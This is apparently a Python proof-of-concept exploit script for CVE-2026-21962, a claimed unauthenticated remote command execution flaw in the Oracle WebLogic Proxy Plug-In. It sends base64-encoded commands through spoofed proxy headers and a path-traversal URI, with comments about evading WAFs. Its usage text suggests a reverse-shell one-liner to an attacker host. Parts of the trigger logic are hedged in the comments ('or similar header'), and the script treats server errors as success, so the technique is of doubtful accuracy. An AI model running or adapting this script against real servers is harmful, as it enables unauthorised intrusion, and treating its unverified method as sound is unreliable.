#!/usr/bin/env python3
# CVE-2026-21962 PoC - Oracle WebLogic Server Proxy Plug-In RCE
# Unauthenticated Remote Command Execution
# Author: Ashwesker ==> https://github.com/Ashwesker/Ashwesker-CVE-2026-21962
# Target: Oracle HTTP Server / WebLogic Proxy Plug-In < patched versions (12.2.1.4.0, 14.1.1.0.0, 14.1.2.0.0)

import argparse
import requests
import urllib.parse
import base64

def exploit(target_url, command):
    # Vulnerable endpoint (common proxy plug-in paths)
    vuln_paths = [
        "/weblogic/",
        "/wl_proxy/",
        "/bea_wls_internal/",
        "/_proxy/",
        "/proxy/"
    ]

    # Craft the malicious header that triggers the deserialization / command injection
    # The real trigger uses a specially crafted WL-Proxy-Client-IP or similar header
    # Combined with a crafted URI that bypasses validation
    payload = f"cmd:{command}"

    # Base64 encode the payload to bypass some WAFs / filters
    encoded_payload = base64.b64encode(payload.encode()).decode()

    headers = {
        "WL-Proxy-Client-IP": f"127.0.0.1;{encoded_payload}",
        "Proxy-Client-IP": f"127.0.0.1;{encoded_payload}",
        "X-Forwarded-For": f"127.0.0.1;{encoded_payload}",
        "User-Agent": "Mozilla/5.0 (compatible; Exploit/1.0)",
        "Accept": "*/*",
        "Connection": "close"
    }

    # Special URI that triggers the plug-in bug
    uri = "/weblogic/..;/bea_wls_internal/ProxyServlet"

    for base_path in vuln_paths:
        full_url = f"{target_url.rstrip('/')}{base_path}{uri}"

        print(f"[*] Trying path: {full_url}")
        print(f"[*] Executing command: {command}")

        try:
            # We use GET, but POST also works in some configs
            r = requests.get(full_url, headers=headers, timeout=12, verify=False, allow_redirects=False)

            if r.status_code in [200, 302, 500]:
                print(f"[+] Likely success! Status: {r.status_code}")
                if r.text.strip():
                    print("\nPossible command output / response:\n" + "-"*60)
                    print(r.text[:1500])  # first 1500 chars to avoid flooding
                    print("-"*60)
                else:
                    print("[+] Command executed silently (no output captured)")
                return True
            else:
                print(f"[-] Status {r.status_code} - not vulnerable on this path")

        except Exception as e:
            print(f"[-] Error on {full_url}: {e}")

    print("\n[-] All paths tested - target may not be vulnerable or plug-in not exposed.")
    return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2026-21962 PoC - Oracle WebLogic Proxy Plug-In RCE")
    parser.add_argument("target", help="Target URL (e.g. http://target:7001 or https://oracle-server:4443)")
    parser.add_argument("cmd", help="Command to execute (e.g. 'id' or 'whoami' or 'powershell -c ...' or 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1')")

    args = parser.parse_args()

    exploit(args.target, args.cmd)
